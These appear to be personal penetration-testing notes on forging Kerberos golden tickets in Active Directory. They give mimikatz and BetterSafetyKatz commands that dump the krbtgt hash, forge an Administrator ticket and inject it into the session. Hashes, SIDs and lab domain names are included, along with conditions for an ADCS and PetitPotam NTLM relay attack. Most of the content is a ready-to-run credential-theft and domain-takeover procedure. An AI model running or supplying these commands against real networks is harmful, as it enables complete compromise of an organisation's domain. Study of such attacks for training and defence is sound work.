Golden Tickets

• assume the domain controller has been compromised
• create a golden ticket

background

• complete access to the whole domain
• mimikatz
• lsadump::lsa /inject /name:krbtgt
• copy domain s-id
• copy primary NTLM
• kerberos::golden /User:Administrator /Domain:marvel.local /sid:SID /krbtgt:HASH /id:500 /ptt
• misc::cmd
• now I have a shell that I could use for psexec for all computers in the domain
• TODO: what is a silver ticket?
• TODO: howto extract golden ticket to client?

usage

# Extracting the krbtgt account's password `NTLM` hash:
$ mimikatz # lsadump::lsa /inject /name:krbtgt
 
# Creating a forged golden ticket that automatically gets injected in current logon session's memory:
# 8584c.. : NTLM-Hash from lsadump
$ mimikatz # kerberos::golden /domain:offense.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt
 
# check if the ticket was created
$ klist

PS> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

ADCS + PetitPotam NTLM Relay = GoldenTicket

Below are some of the conditions making an AD environment vulnerable to ADCS + NTLM relay attack:

• ADCS is configured to allow NTLM authentication;
• NTLM authentication is not protected by EPA or SMB signing;
• ADCS is running either of these services:
  • Certificate Authority Web Enrollment
  • Certificate Enrollment Web Service

references

• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets
• https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate